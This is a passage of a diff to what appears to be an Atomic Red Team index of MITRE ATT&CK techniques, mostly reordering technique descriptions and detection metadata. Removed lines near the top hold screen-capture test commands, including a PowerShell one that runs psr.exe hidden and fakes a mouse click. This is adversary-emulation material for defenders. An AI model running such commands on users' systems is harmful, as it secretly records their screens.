- prereq_command: 'if import --version; then exit 0; else exit 1; fi
-
-'
- get_prereq_command: 'sudo apt-get -y install imagemagick
-
-'
- executor:
- command: 'import -window root #{output_file}
-
-'
- cleanup_command: 'rm #{output_file}
-
-'
- name: bash
- - name: Windows Screencapture
- auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
- description: 'Use Psr.exe binary to collect screenshots of user display. Test
- will do left mouse click to simulate user behaviour
-
-'
- supported_platforms:
- - windows
- input_arguments:
- output_file:
- description: Output file path
- type: Path
- default: c:\temp\T1113_desktop.zip
- recording_time:
- description: Time to take screenshots
- type: String
- default: 5
- executor:
- name: powershell
- elevation_required: false
- command: |
- cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
- Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
- [W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
- cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
- cleanup_command: 'rm #{output_file} -ErrorAction Ignore'
- T1213.002:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Sharepoint
- description: |
- Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
-
- * Policies, procedures, and standards
- * Physical / logical network diagrams
- * System architecture diagrams
- * Technical system documentation
- * Testing / development credentials
- * Work / project schedules
- * Source code snippets
- * Links to network shares and other internal resources
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T16:41:00.821Z'
- created: '2020-02-14T13:35:32.938Z'
- x_mitre_detection: "The user access logging within Microsoft's SharePoint can
- be configured to report access to certain pages and documents. (Citation:
- Microsoft SharePoint Logging). As information repositories generally have
- a considerably large user base, detection of malicious use can be non-trivial.
- At minimum, access to information repositories performed by privileged users
- (for example, Active Directory Domain, Enterprise, or Schema Administrators)
- should be closely monitored and alerted upon, as these types of accounts should
- not generally used to access information repositories. If the capability exists,
- it may be of value to monitor and alert on users that are retrieving and viewing
- a large number of documents and pages; this behavior may be indicative of
- programmatic means being used to retrieve all data within the repository.
- In environments with high-maturity, it may be possible to leverage User-Behavioral
- Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
- x_mitre_data_sources:
- - Office 365 audit logs
- - Authentication logs
- - Application logs
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- - Office 365
- atomic_tests: []
- T1125:
- technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1125
- external_id: T1125
- - external_id: CAPEC-634
- source_name: capec
- url: https://capec.mitre.org/data/definitions/634.html
- - url: https://objective-see.com/blog/blog_0x25.html
- description: Patrick Wardle. (n.d.). Retrieved March 20, 2018.
- source_name: objective-see 2017 review
- description: |-
- An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
-
- Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
-
- In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)
- name: Video Capture
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-07-14T19:40:47.644Z'
- created: '2017-05-31T21:31:37.917Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- - API monitoring
- x_mitre_detection: |-
- Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
-
- Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- - macOS
- atomic_tests: []
- T1056.003:
- technique:
- created: '2020-02-11T18:59:50.058Z'
- modified: '2020-03-24T21:16:16.580Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- type: attack-pattern
- id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
- description: |-
- Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
-
- This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)
- name: Web Portal Capture
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1056.003
- url: https://attack.mitre.org/techniques/T1056/003
- - external_id: CAPEC-569
- source_name: capec
- url: https://capec.mitre.org/data/definitions/569.html
- - url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
- description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco
- Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.'
- source_name: Volexity Virtual Private Keylogging
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: File monitoring may be used to detect changes to files in
- the Web directory for organization login pages that do not match with authorized
- updates to the Web server's content.
- x_mitre_data_sources:
- - File monitoring
- x_mitre_system_requirements:
- - An externally facing login portal is configured.
- atomic_tests: []
exfiltration:
T1020:
technique:
@@ -53690,13 +59328,14 @@ exfiltration:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: exfiltration
- modified: '2020-03-11T13:58:08.219Z'
+ modified: '2020-10-22T02:24:54.881Z'
created: '2017-05-31T21:30:29.458Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
+ - Network
x_mitre_network_requirements: true
x_mitre_detection: Monitor process file access patterns and network behavior.
Unrecognized processes or scripts that appear to be traversing file systems
@@ -53705,7 +59344,7 @@ exfiltration:
- File monitoring
- Process monitoring
- Process use of network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
identifier: T1020
atomic_tests:
- name: IcedID Botnet HTTP PUT
@@ -53821,8 +59460,25 @@ exfiltration:
name: sh
T1048:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:44.720Z'
+ modified: '2020-03-28T00:50:31.548Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ type: attack-pattern
+ id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Exfiltration Over Alternative Protocol
+ description: "Adversaries may steal data by exfiltrating it over a different
+ protocol than that of the existing command and control channel. The data may
+ also be sent to an alternate network location from the main command and control
+ server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any
+ other network protocol not being used as the main command and control channel.
+ Different protocol channels could also include Web services such as cloud
+ storage. Adversaries may also opt to encrypt and/or obfuscate these alternate
+ channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)
+ can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB
+ or FTP.(Citation: Palo Alto OilRig Oct 2016) "
external_references:
- source_name: mitre-attack
external_id: T1048
@@ -53835,46 +59491,29 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- description: "Adversaries may steal data by exfiltrating it over a different
- protocol than that of the existing command and control channel. The data may
- also be sent to an alternate network location from the main command and control
- server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any
- other network protocol not being used as the main command and control channel.
- Different protocol channels could also include Web services such as cloud
- storage. Adversaries may also opt to encrypt and/or obfuscate these alternate
- channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)
- can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB
- or FTP.(Citation: Palo Alto OilRig Oct 2016) "
- name: Exfiltration Over Alternative Protocol
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: exfiltration
- modified: '2020-03-28T00:50:31.548Z'
- created: '2017-05-31T21:30:44.720Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - Process monitoring
- - Process use of network
- - Packet capture
- - Netflow/Enclave netflow
- - Network protocol analysis
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Alfredo Abarca
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_contributors:
- - Alfredo Abarca
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process use of network
+ - Packet capture
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ x_mitre_version: '1.2'
identifier: T1048
atomic_tests:
- name: Exfiltration Over Alternative Protocol - SSH
@@ -54017,18 +59656,8 @@ exfiltration:
atomic_tests: []
T1041:
technique:
- created: '2017-05-31T21:30:41.804Z'
- modified: '2020-03-12T15:59:47.470Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: exfiltration
- type: attack-pattern
- id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exfiltration Over C2 Channel
- description: Adversaries may steal data by exfiltrating it over an existing
- command and control channel. Stolen data is encoded into the normal communications
- channel using the same protocol as command and control communications.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1041
@@ -54037,26 +59666,36 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_network_requirements: true
+ description: Adversaries may steal data by exfiltrating it over an existing
+ command and control channel. Stolen data is encoded into the normal communications
+ channel using the same protocol as command and control communications.
+ name: Exfiltration Over C2 Channel
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ modified: '2020-03-12T15:59:47.470Z'
+ created: '2017-05-31T21:30:41.804Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Netflow/Enclave netflow
+ - Process monitoring
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Netflow/Enclave netflow
- - Process monitoring
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1011:
technique:
@@ -54194,18 +59833,13 @@ exfiltration:
atomic_tests: []
T1048.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1048.003
- url: https://attack.mitre.org/techniques/T1048/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
+ created: '2020-03-15T15:37:47.583Z'
+ modified: '2020-03-28T00:50:31.361Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ type: attack-pattern
+ id: attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
network protocol other than that of the existing command and control channel.
The data may also be sent to an alternate network location from the main command
@@ -54214,31 +59848,36 @@ exfiltration:
(such as HTTP, FTP, or DNS). This may include custom or publicly available
encoding/compression algorithms (such as base64) as well as embedding data
within protocol headers and fields. "
- id: attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: exfiltration
- modified: '2020-03-28T00:50:31.361Z'
- created: '2020-03-15T15:37:47.583Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_network_requirements: true
+ name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1048.003
+ url: https://attack.mitre.org/techniques/T1048/003
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Packet capture
+ - Process use of network
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2) '
- x_mitre_data_sources:
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Packet capture
- - Process use of network
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_network_requirements: true
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1048.003
atomic_tests:
- name: Exfiltration Over Alternative Protocol - HTTP
@@ -54510,6 +60149,65 @@ exfiltration:
- Process monitoring
x_mitre_version: '1.1'
atomic_tests: []
+ T1020.001:
+ technique:
+ created: '2020-10-19T13:40:11.118Z'
+ modified: '2020-10-22T02:24:54.640Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ type: attack-pattern
+ id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
+ description: |-
+ Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)
+
+ Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.
+ name: Traffic Duplication
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1020.001
+ url: https://attack.mitre.org/techniques/T1020/001
+ - external_id: CAPEC-117
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/117.html
+ - source_name: Cisco Traffic Mirroring
+ url: https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html
+ description: Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component
+ Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October
+ 19, 2020.
+ - source_name: Juniper Traffic Mirroring
+ url: https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html
+ description: Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200,
+ EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved
+ October 19, 2020.
+ - source_name: US-CERT-TA18-106A
+ url: https://www.us-cert.gov/ncas/alerts/TA18-106A
+ description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored
+ Cyber Actors Targeting Network Infrastructure Devices. Retrieved October
+ 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ x_mitre_platforms:
+ - Network
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Packet capture
+ - Network protocol analysis
+ x_mitre_detection: 'Monitor network traffic for uncommon data flows (e.g. unusual
+ network communications, suspicious communications that have never been seen
+ before, communications sending fixed size data packets at regular intervals). Analyze
+ packet contents to detect communications that do not follow the expected protocol
+ behavior for the port that is being used. '
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1537:
technique:
external_references:
@@ -54566,6 +60264,15 @@ exfiltration:
initial-access:
T1078.004:
technique:
+ id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
+ description: |-
+ Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
+
+ Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
+ name: Cloud Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.004
@@ -54582,15 +60289,6 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
description: Microsoft. (n.d.). Deploying Active Directory Federation Services
in Azure. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
-
- Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
- id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -54601,21 +60299,8 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.729Z'
+ modified: '2020-10-19T16:01:22.090Z'
created: '2020-03-13T20:36:57.378Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -54623,6 +60308,19 @@ initial-access:
- SaaS
- Azure AD
- Office 365
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
+ or malicious behavior, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
atomic_tests: []
T1195.003:
technique:
@@ -54760,6 +60458,9 @@ initial-access:
- source_name: mitre-attack
external_id: T1078.001
url: https://attack.mitre.org/techniques/T1078/001
+ - external_id: CAPEC-70
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/70.html
- source_name: Microsoft Local Accounts Feb 2019
url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
description: Microsoft. (2018, December 9). Local Accounts. Retrieved February
@@ -54786,9 +60487,9 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:37:34.567Z'
+ modified: '2020-09-16T19:41:43.491Z'
created: '2020-03-13T20:15:31.974Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -54839,31 +60540,13 @@ initial-access:
elevation_required: true
T1078.002:
technique:
- created: '2020-03-13T20:21:54.758Z'
- modified: '2020-03-23T21:08:40.063Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- type: attack-pattern
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- name: Domain Accounts
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
url: https://attack.mitre.org/techniques/T1078/002
+ - external_id: CAPEC-560
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/560.html
- url: https://technet.microsoft.com/en-us/library/dn535501.aspx
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
@@ -54876,22 +60559,43 @@ initial-access:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Process monitoring
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Accounts
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ modified: '2020-09-16T19:42:11.787Z'
+ created: '2020-03-13T20:21:54.758Z'
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1189:
technique:
@@ -54984,8 +60688,27 @@ initial-access:
atomic_tests: []
T1190:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ id: attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Exploit Public-Facing Application
+ description: "Adversaries may attempt to take advantage of a weakness in an
+ Internet-facing computer or program using software, data, or commands in order
+ to cause unintended or unanticipated behavior. The weakness in the system
+ can be a bug, a glitch, or a design vulnerability. These applications are
+ often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662),
+ standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or
+ SSH), network device administration and management protocols (like SNMP and
+ Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation:
+ Cisco Blog Legacy Device Attacks)), and any other applications with Internet
+ accessible open sockets, such as web servers and related services.(Citation:
+ NVD CVE-2014-7169) Depending on the flaw being exploited this may include
+ [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).
+ \n\nIf an application is hosted on cloud-based infrastructure, then exploiting
+ it may lead to compromise of the underlying instance. This can allow an adversary
